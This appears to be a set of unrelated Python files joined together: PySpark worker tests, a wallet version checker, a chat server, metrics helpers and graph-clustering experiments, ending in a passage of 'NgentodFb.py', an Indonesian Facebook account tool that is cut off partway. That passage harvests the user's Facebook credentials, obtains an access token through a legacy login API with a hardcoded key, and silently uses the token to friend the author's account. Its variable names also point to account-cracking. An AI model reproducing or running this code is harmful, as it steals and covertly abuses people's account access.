except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_after_exception(self):
def raise_exception(_):
raise RuntimeError()
rdd = self.sc.parallelize(range(100), 1)
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_non_exception_error(self):
# SPARK-33339: Pyspark application will hang due to non Exception
def raise_system_exit(_):
raise SystemExit()
rdd = self.sc.parallelize(range(100), 1)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: rdd.foreach(raise_system_exit))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(range(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(range(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
def test_reuse_worker_after_take(self):
rdd = self.sc.parallelize(range(100000), 1)
self.assertEqual(0, rdd.first())
def count():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=count)
t.daemon = True
t.start()
t.join(5)
self.assertTrue(not t.is_alive())
self.assertEqual(100000, rdd.count())
def test_with_different_versions_of_python(self):
rdd = self.sc.parallelize(range(10))
rdd.count()
version = self.sc.pythonVer
self.sc.pythonVer = "2.0"
try:
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.count())
finally:
self.sc.pythonVer = version
def test_python_exception_non_hanging(self):
# SPARK-21045: exceptions with no ascii encoding shall not hanging PySpark.
try:
def f():
raise RuntimeError("exception with 中 and \xd6\xd0")
self.sc.parallelize([1]).map(lambda x: f()).count()
except Py4JJavaError as e:
self.assertRegex(str(e), "exception with 中")
class WorkerReuseTest(PySparkTestCase):
def test_reuse_worker_of_parallelize_range(self):
rdd = self.sc.parallelize(range(20), 8)
previous_pids = rdd.map(lambda x: os.getpid()).collect()
current_pids = rdd.map(lambda x: os.getpid()).collect()
for pid in current_pids:
self.assertTrue(pid in previous_pids)
@unittest.skipIf(
not has_resource_module or sys.platform != 'linux',
"Memory limit feature in Python worker is dependent on "
"Python's 'resource' module on Linux; however, not found or not on Linux.")
class WorkerMemoryTest(unittest.TestCase):
def setUp(self):
class_name = self.__class__.__name__
conf = SparkConf().set("spark.executor.pyspark.memory", "2g")
self.sc = SparkContext('local[4]', class_name, conf=conf)
def test_memory_limit(self):
rdd = self.sc.parallelize(range(1), 1)
def getrlimit():
import resource
return resource.getrlimit(resource.RLIMIT_AS)
actual = rdd.map(lambda _: getrlimit()).collect()
self.assertTrue(len(actual) == 1)
self.assertTrue(len(actual[0]) == 2)
[(soft_limit, hard_limit)] = actual
self.assertEqual(soft_limit, 2 * 1024 * 1024 * 1024)
self.assertEqual(hard_limit, 2 * 1024 * 1024 * 1024)
def tearDown(self):
self.sc.stop()
class WorkerSegfaultTest(ReusedPySparkTestCase):
@classmethod
def conf(cls):
_conf = super(WorkerSegfaultTest, cls).conf()
_conf.set("spark.python.worker.faulthandler.enabled", "true")
return _conf
def test_python_segfault(self):
try:
def f():
import ctypes
ctypes.string_at(0)
self.sc.parallelize([1]).map(lambda x: f()).count()
except Py4JJavaError as e:
self.assertRegex(str(e), "Segmentation fault")
@unittest.skipIf(
"COVERAGE_PROCESS_START" in os.environ,
"Flaky with coverage enabled, skipping for now."
)
class WorkerSegfaultNonDaemonTest(WorkerSegfaultTest):
@classmethod
def conf(cls):
_conf = super(WorkerSegfaultNonDaemonTest, cls).conf()
_conf.set("spark.python.use.daemon", "false")
return _conf
if __name__ == "__main__":
import unittest
from pyspark.tests.test_worker import * # noqa: F401
try:
import xmlrunner # type: ignore[import]
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
|
version.py
|
import subprocess
import sys
import logging
import re
import threading
import time
import os
import requests
logger = logging.getLogger(__name__)
class VersionChecker:
def __init__(self, name="cryptoadvance.specter"):
self.name = name
self.current = "unknown"
self.latest = "unknown"
self.upgrade = False
self.running = False
def start(self):
if not self.running:
self.running = True
self.thread = threading.Thread(target=self.loop)
self.thread.daemon = True
self.thread.start()
def stop(self):
self.running = False
@property
def info(self):
return {
"current": self.current,
"latest": self.latest,
"upgrade": self.upgrade,
}
def loop(self, dt=3600):
"""Checks for updates once per hour"""
while self.running:
self.current, self.latest, self.upgrade = self.get_version_info()
logger.info(f"version checked. upgrade: {self.upgrade}")
time.sleep(dt)
def get_binary_version(self):
"""
Get binary version: current, latest.
Fails if version.txt is not present.
Returns latest = "unknown" if fetch failed.
"""
version_file = "version.txt"
if getattr(sys, 'frozen', False):
version_file = os.path.join(sys._MEIPASS, 'version.txt')
with open(version_file) as f:
current = f.read().strip()
try:
releases = requests.get("https://api.github.com/repos/cryptoadvance/specter-desktop/releases").json()
latest = "unknown"
for release in releases:
if release["prerelease"] or release["draft"]:
continue
latest = release["name"]
break
except:
latest = "unknown"
return current, latest
def get_pip_version(self):
latest = str(subprocess.run([
sys.executable, '-m', 'pip',
'install', f'{self.name}==random'],
capture_output=True, text=True))
latest = latest[latest.find(
'(from versions:')+15:]
latest = latest[:latest.find(')')]
latest = latest.replace(' ', '').split(',')[-1]
current = str(subprocess.run([
sys.executable, '-m', 'pip',
'show', f'{self.name}'],
capture_output=True, text=True))
current = current[current.find(
'Version:')+8:]
current = current[:current.find(
'\\n')].replace(' ', '')
# master?
if current == 'vx.y.z-get-replaced-by-release-script':
current = 'custom'
# no need to check upgrades
self.running = False
return current, latest
def get_version_info(self):
'''
Returns a triple of the current version
of the pip-package cryptoadvance.specter and
the latest version and whether you should upgrade.
'''
# check if we have version.txt file
# this is the case for binaries
current = "unknown"
latest = "unknown"
# check binary version
try:
current, latest = self.get_binary_version()
# if file not found
except FileNotFoundError as exc:
try:
current, latest = self.get_pip_version()
except Exception as exc:
logger.error(exc)
# other exceptions
except Exception as exc:
logger.error(exc)
# check that both current and latest versions match the pattern
if (re.search(r"v?([\d+]).([\d+]).([\d+]).*", current) and
re.search(r"v?([\d+]).([\d+]).([\d+]).*", latest)):
return (
current,
latest,
# check without leading v so v1.2.3 = 1.2.3
latest.replace("v","") != current.replace("v","")
)
return current, latest, False
|
server.py
|
# Python 3.7
# Usage: python3 server.py server_port block_duration timeout
# coding: utf-8
import sys
from socket import *
from datetime import datetime
from threading import Timer, Condition, Thread
from helper import retrieve_components, decorate_chat_msg, is_existing_user, username2password
server_port = int(sys.argv[1])
block_duration = int(sys.argv[2])
timeout = int(sys.argv[3])
class User:
""" contains all the information about the online user """
def __init__(self, socket, address):
self.username = None
self.socket = socket
self.address = address
self.private_accepting_port = None
def __repr__(self):
return "User({}, {})".format(self.socket, self.address)
def get_username(self):
return self.username
def get_socket(self):
return self.socket
def get_address(self):
return self.address
def get_private_accepting_port(self):
return self.private_accepting_port
def set_username(self, username):
self.username = username
def set_private_accepting_port(self, port):
self.private_accepting_port = port
def send_prompt(self, prompt):
self.socket.send(prompt.encode())
def get_input(self):
message = self.socket.recv(2048)
return message.decode()
def create_thread(user_object):
""" create a separate thread for handling the interaction between the
server and each client
"""
thread = Thread(name="MainHandler", target=main_handler, args=[user_object])
thread.daemon = True
thread.start()
def is_online_user(username):
""" return True if 'username' is online """
return username in [user.get_username() for user in online_users]
def has_blocked(userA, userB):
""" return True if userA has blocked userB """
if userB in block_users:
if userA in block_users[userB]:
return True
else:
return False
else:
return False
def has_existing_connection(userA, userB):
""" return True if there's a private messaging session between userA and userB """
if userA in activeP2PSessions:
if userB in activeP2PSessions[userA]:
return True
if userB in activeP2PSessions:
if userA in activeP2PSessions[userB]:
return True
return False
def login_unblock(username):
""" unblock the user by removing the user from the blocked_list
and remove its # of unsuccessful login attempts history
"""
del unSuccessfulAttempt[username]
del blocked_login[username]
def send_broadcast(user, message, typeOfMsg):
"""send broadcast to all online users that didn't block the sender
Parameters:
user (User): the user object
message (String): the message
typeOfMsg (int): 0 impiles the message is a normal broadcast,
1 impiles the message is a login/logout broadcast
"""
if typeOfMsg == 0:
get_blocked = False
for online_user in online_users:
if has_blocked(online_user.get_username(), user.get_username()):
get_blocked = True
continue
if user.get_username() == online_user.get_username():
continue
online_user.send_prompt(message)
if get_blocked:
user.send_prompt("Your message could not be delivered to some recipients")
elif typeOfMsg == 1:
for online_user in online_users:
# when A login/logout do not inform B if A blocked B and
# do not inform A itself
if has_blocked(user.get_username(), online_user.get_username())\
or user.get_username() == online_user.get_username():
continue
online_user.send_prompt(message)
def logout(user):
""" logout the user from the server, following operations are done
(1) send broadcast to notify users that user has logged out
(2) remove the user from the online users list
(3) record the user's last online time
(4) send message to the client application to confirm the log out
(5) remove the user's record from all active P2P sessions
(6) delete the user object
"""
send_broadcast(user, user.get_username() + " has logged out\n", 1)
for online_user in online_users:
if online_user.get_username() == user.get_username():
online_users.remove(online_user)
lastLoggedIn[online_user.get_username()] = datetime.now()
user.send_prompt("WhatsApp " + user.get_username() + " logout")
break
if user.get_username() in activeP2PSessions:
del activeP2PSessions[user.get_username()]
for activeuser in activeP2PSessions:
if user.get_username() in activeP2PSessions[activeuser]:
activeP2PSessions[activeuser].remove(user.get_username())
del user
def login_process(user):
""" handles all interactions between the server and the client while
the client is trying to login
"""
while (1):
user.send_prompt("Username: ")
username = user.get_input()
if is_existing_user(username, username2password):
for _ in range(3):
user.send_prompt("Password: ")
password = user.get_input()
if is_online_user(username):
user.send_prompt("This account has logged in on another device.\n")
password = ""
break
elif username2password[username] == password:
if username in blocked_login:
user.send_prompt("Your account has been blocked. Please try again later.\n")
break
# delete user's unsuccessful login record if the password is
# correct
if username in unSuccessfulAttempt:
del unSuccessfulAttempt[username]
# set the name of the user and add it to the online_users list
user.set_username(username)
online_users.append(user)
send_broadcast(user, user.get_username() + " has logged in", 1)
break
else:
# user inputs wrong password
if username in unSuccessfulAttempt:
unSuccessfulAttempt[username] += 1
if unSuccessfulAttempt[username] >= 3:
if username not in blocked_login:
blocked_login[username] = Timer(block_duration, login_unblock, [username])
blocked_login[username].start()
user.send_prompt("Your account has been blocked. Please try again later.\n")
break
else:
unSuccessfulAttempt[username] = 1
user.send_prompt("Invalid Password. Please try again.\n")
else:
user.send_prompt("User doesn't exist\n")
continue
# user logs in successfully
if password == username2password[username] and username not in blocked_login:
user.send_prompt("Welcome back !\n")
# sends out all the cached offline messages to the client
if user.get_username() in offline_msg_box:
for msg in offline_msg_box[user.get_username()]:
user.send_prompt(msg)
del offline_msg_box[user.get_username()]
# try to get back the port number used by the client for accepting
# private connections
private = user.get_input()
private = private.split(' ')
user.set_private_accepting_port(private[1])
break
def main_process(user):
""" handle the command received from the client """
while (1):
t = Timer(timeout, logout, [user])
t.start()
command = user.get_input()
if command == "logout":
logout(user)
t.cancel()
break
elif command.startswith("message "):
userComponent, message = retrieve_components(command)
message = decorate_chat_msg(user.get_username(), message)
if userComponent == user.get_username():
user.send_prompt("Can't send message to yourself")
t.cancel()
continue
elif has_blocked(userComponent, user.get_username()):
user.send_prompt("Your message could not be delivered as the recipient has blocked you")
t.cancel()
continue
if is_existing_user(userComponent, username2password):
for online_user in online_users:
if online_user.get_username() == userComponent:
online_user.send_prompt(message)
break
# if the user is offline, add the message to the offline mail box
else:
message = message + '\n'
if userComponent in offline_msg_box:
offline_msg_box[userComponent].append(message)
else:
offline_msg_box[userComponent] = [message]
else:
user.send_prompt("Invalid user")
elif command.startswith("broadcast "):
message = retrieve_components(command)
message = decorate_chat_msg(user.get_username(), message)
send_broadcast(user, message, 0)
elif command == "whoelse":
prompt = "Online Users: "
for online_user in online_users:
if (online_user.get_username() != user.get_username()):
prompt = prompt + online_user.get_username() + ", "
prompt = prompt.rstrip(", ")
prompt += '\n'
user.send_prompt(prompt)
elif command.startswith("whoelsesince "):
time = int(retrieve_components(command))
# stores online users' name into a set
result = {online_user.get_username() for online_user in online_users}
for i in lastLoggedIn:
lastTime = lastLoggedIn[i]
now = datetime.now()
timeDelta = now - lastTime
# stores the user into the result set if it's not online since
# that time
if timeDelta.seconds < time:
result.add(i)
# removes the client itself from the result
if user.get_username() in result:
result.remove(user.get_username())
# construct the prompt
prompt = "Users: "
for i in result:
prompt = prompt + i + ", "
prompt = prompt.rstrip(", ")
prompt += '\n'
user.send_prompt(prompt)
elif command.startswith("block "):
userComponent = retrieve_components(command)
if userComponent not in username2password:
user.send_prompt("User is invalid")
t.cancel()
continue
elif userComponent == user.get_username():
user.send_prompt("Can't block yourself")
t.cancel()
continue
user.send_prompt("You have blocked " + userComponent)
if userComponent in block_users:
block_users[userComponent].add(user.get_username())
else:
block_users[userComponent] = {user.get_username()}
elif command.startswith("unblock "):
userComponent = retrieve_components(command)
if userComponent not in username2password:
user.send_prompt("Username is invalid")
elif userComponent == user.get_username():
user.send_prompt("Unblocking yourself is invalid")
elif userComponent in block_users and user.get_username() in block_users[userComponent]:
user.send_prompt("You have unblocked " + userComponent)
block_users[userComponent].remove(user.get_username())
else:
user.send_prompt("User " + userComponent + " is not in your block list")
elif command.startswith("startprivate "):
userComponent = retrieve_components(command)
if not is_existing_user(userComponent, username2password):
user.send_prompt("User doesn't exist")
t.cancel()
continue
elif has_existing_connection(user.get_username(), userComponent):
user.send_prompt("Can't establish private connection as current private connection with this user exists")
t.cancel()
continue
if userComponent != user.get_username():
for online_user in online_users:
if online_user.get_username() == userComponent:
if has_blocked(userComponent, user.get_username()):
user.send_prompt("Private message can't be established as you have been blocked")
else:
if user.get_username() not in activeP2PSessions:
activeP2PSessions[user.get_username()] = [online_user.get_username()]
else:
activeP2PSessions[user.get_username()].append(online_user.get_username())
online_user.send_prompt("WhatsApp " + online_user.get_username() + " allowprivate " + user.get_username())
user.send_prompt("WhatsApp " + user.get_username() + " startprivate " + str(online_user.get_address()) + " " + str(online_user.get_private_accepting_port()) + " " + online_user.get_username())
break
else:
user.send_prompt(userComponent + " is offline")
else:
user.send_prompt("Can't start private message with yourself")
elif command.startswith("stopprivate "):
userComponent = retrieve_components(command)
found = False
# check if there exists a private session between two users
if user.get_username() in activeP2PSessions:
if userComponent in activeP2PSessions[user.get_username()]:
activeP2PSessions[user.get_username()].remove(userComponent)
found = True
elif userComponent in activeP2PSessions:
if user.get_username() in activeP2PSessions[userComponent]:
activeP2PSessions[userComponent].remove(user.get_username())
found = True
# asks two users to discontinue their private connection if there's one between them
if found:
for online_user in online_users:
if online_user.get_username() == user.get_username():
online_user.send_prompt("WhatsApp stopprivate (1) " + userComponent)
elif online_user.get_username() == userComponent:
online_user.send_prompt("WhatsApp stopprivate (2) " + user.get_username())
else:
fail_message = "You don't have an active p2p session with " + userComponent
user.send_prompt(fail_message)
elif command == "WhatsApp sent private command":
t.cancel()
continue
else:
if user in online_users:
user.send_prompt("Invalid command")
else:
# user has been logged out by the server automatically after timeout
t.cancel()
break
t.cancel()
def main_handler(user_object):
""" all interactions between the server and the client, consists
of login process and main process
this function is called inside create_thread()
"""
global t_lock
login_process(user_object)
lastLoggedIn[user_object.get_username()] = datetime.now()
main_process(user_object)
t_lock = Condition()
# the number of unsuccessful attempts for each user
# stored in the format {user1: 3, user2: 2, ...}
unSuccessfulAttempt = {}
# users that are blocked for a period
blocked_login = {}
# user to user blocking
# here user1 is blocked by user2, user3, ...
# {user1: {user2, user3, ...}}
block_users = {}
# stores a list of online users.
online_users = []
# stores message in the format {user1:[msg1, msg2, ...], user2: [msg1, msg2, ...]}
offline_msg_box = {}
# saves the last online time for all users in the format {user1: time1, ...}
lastLoggedIn = {}
# saves active p2p messaging sessions user pairs
# if A initiates a p2p session with B, then {A: [B], ...}
activeP2PSessions = {}
# server's socket allowing clients to connect with
server_socket = socket(AF_INET, SOCK_STREAM)
server_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
server_socket.bind(('localhost', server_port))
server_socket.listen(1);
while 1:
# creates a connection socket dedicated to this particular client
connectionSocket, clientAddress = server_socket.accept()
user = User(connectionSocket, clientAddress[0])
# create a separate thread for the client
create_thread(user)
server_socket.close()
|
performance_metrics.py
|
from os import environ
import psutil, threading, hashlib
environ["PYTHONHASHSEED"] = '1234'
def ratio(before, after):
return 100 * (1 - (after / before))
# def integrity(before, after):
# md5_before = None
# md5_after = None
# # Open,close, read file and calculate MD5 on its contents
# with open(before) as file_to_check:
# # read contents of the file
# data = file_to_check.read()
# # pipe contents of the file through
# md5_before = hashlib.md5(data.encode("utf8")).hexdigest()
# with open(after) as file_to_check:
# # read contents of the file
# data = file_to_check.read()
# # pipe contents of the file through
# md5_after = hashlib.md5(data.encode("utf8")).hexdigest()
# # Finally compare original MD5 with freshly calculated
# if md5_before == md5_after:
# print("MD5 verified.")
# else:
# print("MD5 verification failed!.")
def integrity(filename):
md5 = hashlib.md5()
# Open,close, read file and calculate MD5 on its contents
with open(filename, "rb") as file_to_check:
# read contents of the file
for block in iter(lambda: file_to_check.read(4096), b''):
md5.update(block)
return md5.hexdigest()
def performance_metrics():
global running
global cpu_usage
global memory_usage
cpu_usage = []
memory_usage = []
running = True
current_process = psutil.Process()
# start loop
while running:
cpu_usage.append(current_process.cpu_percent(interval = 1))
memory_usage.append(current_process.memory_percent())
def performance_metrics_system_wide():
global running
global cpu_usage
global memory_usage
cpu_usage = []
memory_usage = []
running = True
before_cpu_usage = psutil.cpu_percent()
before_memory_usage = psutil.virtual_memory().percent
# start loop
while running:
cpu_usage.append(abs(psutil.cpu_percent(interval = 1)-before_cpu_usage))
memory_usage.append(abs(psutil.virtual_memory().percent - before_memory_usage))
def start():
global t
# create thread and start it
t = threading.Thread(target = performance_metrics)
t.start()
def start_system_wide():
global t
# create thread and start it
t = threading.Thread(target = performance_metrics_system_wide)
t.start()
def stop():
global running
global cpu_usage
global memory_usage
global t
result = []
result.append(cpu_usage)
result.append(memory_usage)
# use `running` to stop loop in thread so thread will end
running = False
# wait for thread's end
t.join()
return result
|
experiments.py
|
from bokeh.io import export_png, output_file, show
def _get_return(function, x, y, return_var):
return_var.append(function(x, elapsed_time=y))
from tnetwork.DCD.analytics.dynamic_partition import *
from nf1 import NF1
from sklearn.metrics import adjusted_rand_score,normalized_mutual_info_score
import pandas as pd
import numpy as np
from tnetwork.DCD.externals.dynamo import dynamo
from tnetwork.DCD.externals.dynmoga import dynmoga
from tnetwork.DCD.externals.MuchaOriginal import transversal_network_mucha_original
from matlab import engine
def standard_methods_to_test():
eng = engine.start_matlab()
def smoothed_louvain(x, elapsed_time=True):
return tn.DCD.iterative_match(x, CDalgo="smoothedLouvain", elapsed_time=elapsed_time)
# methods_to_test = {"iterative":DCD.iterative_match,"dynamo":dynamo,"dynmoga":dynmoga,"smoothed_louvain":smoothed_louvain}
def mucha_opti(x, elapsed_time=True):
return transversal_network_mucha_original(x, elapsed_time=elapsed_time, matlab_session=eng)
def mucha_global(x, elapsed_time=True):
return transversal_network_mucha_original(x, elapsed_time=elapsed_time, matlab_session=eng, form="global")
print("pas de mucha")
methods_to_test = {"iterative": tn.DCD.iterative_match,
"dynamo": dynamo,
"smoothed_louvain": smoothed_louvain,
"mucha": mucha_opti, # "mucha_global":mucha_global,
"survival_graph": tn.DCD.label_smoothing} # ,"dynmoga":dynmoga}#
# methods_to_test = {"smoothed_louvain":smoothed_louvain}#,"dynmoga":dynmoga}#
return methods_to_test
def generate_graph(nb_com =6,min_size=4,max_size=15,operations=18,mu=0.1):
print("generating graph with nb_com = ",nb_com)
prog_scenario = tn.ComScenario(verbose=False, external_density_penalty=mu)
all_communities = set(prog_scenario.INITIALIZE(np.random.randint(min_size,max_size,size=nb_com)))
for i in range(operations):
[com1] = np.random.choice(list(all_communities),1,replace=False)
all_communities.remove(com1)
if len(com1.nodes())<max_size and len(all_communities)>0: #merge
[com2] = np.random.choice(list(all_communities),1,replace=False)
largest_com = max([com1,com2],key=lambda x: len(x.nodes()))
merged = prog_scenario.MERGE([com1,com2], largest_com.label(), wait=20)
all_communities.remove(com2)
all_communities.add(merged)
else: #split
smallest_size = int(len(com1.nodes())/3)
(com2,com3) = prog_scenario.SPLIT(com1, [prog_scenario._get_new_ID("CUSTOM"), com1.label()], [smallest_size, len(com1.nodes()) - smallest_size], wait=20)
all_communities|= set([com2,com3])
(dyn_graph,dyn_com) = prog_scenario.run()
return(dyn_graph,dyn_com)
def compute_all_stats(all_infos, detailed=True):
names = []
times = []
LaNMI = []
LNMI = []
LF1 = []
LARI = []
nb_changes = []
# entropies = []
ent_by_nodes = []
S = []
modularities = []
nmis = []
IDs = {}
for id,an_experiment in all_infos.items():
GT_as_sn = an_experiment["GT"]
dyn_graph_sn=an_experiment["graph"]
results = an_experiment["result"]
iteration = an_experiment["ID"]
print(id)
for name, (result, time) in results.items():
for k, v in iteration.items():
IDs.setdefault(k,[])
IDs[k].append(v)
names.append(name)
times.append(time["total"])
if detailed:
LaNMI.append(longitudinal_similarity(GT_as_sn, result))
def nf1go(x, y):
a = NF1(y, x)
score = a.get_f1()[0]
return score
LF1.append(longitudinal_similarity(GT_as_sn,result,score=nf1go,convert_coms_sklearn_format=False))
LNMI.append(longitudinal_similarity(GT_as_sn, result))
LARI.append(longitudinal_similarity(GT_as_sn, result, score=adjusted_rand_score))
nb_changes.append(nb_node_change(result))
consecutive_NMIs = consecutive_sn_similarity(result)
#entropies.append(entropy(result))
ent_by_nodes.append(entropy_by_node(result)) #####Slow
S.append(np.average(consecutive_NMIs[0], weights=consecutive_NMIs[1]))
mods = quality_at_each_step(result, dyn_graph_sn)
modularities.append(np.average(mods[0], weights=mods[1]))
sim = similarity_at_each_step(GT_as_sn,result)
nmis.append(np.average(sim[0],weights=sim[1]))
df = pd.DataFrame()
df["algorithm"] = names
df["running time"] = times
if detailed:
df["LaNMI"] = LaNMI
df["LNMI"] = LNMI
df["LF1"] = LF1
df["LARI"] = LARI
df["M"] = nb_changes
#df["I_old"] = entropies
df["I"] = ent_by_nodes
df["S"] = S
df["Q"] = modularities
df["aNMI"] = nmis
df["# nodes"] = len(dyn_graph_sn.snapshots(dyn_graph_sn.snapshots_timesteps()[0]).nodes)
df["# steps"] = len(dyn_graph_sn.snapshots())
for k,l in IDs.items():
df[k]=l
return df
def run_all_algos(methods_to_test, dyn_graph_sn, plot=False, waiting=120):
"""
:param methods_to_test:
:param dyn_graph_sn:
:param plot:
:param waiting:
:return:
"""
results = {}
if plot:
dyn_graph = dyn_graph_sn.to_DynGraphIG(sn_duration=1)
methods_this_step = {name: m for name, m in methods_to_test.items()}
for name, m in methods_this_step.items():
results[name] = m(dyn_graph_sn, elapsed_time=True)
# manager = multiprocessing.Manager()
# temp = manager.list()
# p = multiprocessing.Process(target=_get_return, args=(m,dyn_graph_sn,True,temp))
# p.start()
# p.join(waiting)
# if p.is_alive():
# print ("running... let's kill it...")
# del methods_to_test[name]
# Terminate
# p.terminate()
# p.join()
# else:
# results[name] = temp[0]
if plot:
output_file(name + ".html")
p = tn.plot_longitudinal(dyn_graph, results[name][0].to_DynCommunitiesIG(1))
show(p)
export_png(p, filename=name + ".png")
return results
def subset(graph, com, length):
subgraph = tn.DynGraphSN(list(graph.snapshots().values())[:length])
subcomsGT = tn.DynCommunitiesSN()
for t in subgraph.snapshots_timesteps():
subcomsGT.set_communities(t, com.snapshot_communities(t))
return (subgraph, subcomsGT)
|
NgentodFb.py
|
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Tutup'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;92m█████████\n \x1b[1;92m█▄█████▄█ \x1b[1;97m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;92m█ \x1b[1;93m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;92m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;92m█ \x1b[1;93m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mMarioV2\n \x1b[1;92m█████████ \x1b[1;97m«==========✧==========»\n \x1b[1;92m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m J4CKW!EL_- \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mAuthor \x1b[1;91m: \x1b[1;92m \x1b[92mhttp://marioxploit.home.blog\x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mFB \x1b[1;91m: \x1b[1;92\x1b[92mhttps://fb.me/Asedekontol\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝" '\n\x1b[1;92m[*] Silahkan Login Operamini Agar Tidak Checkpoint\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
except requests.exceptions.ConnectionError:
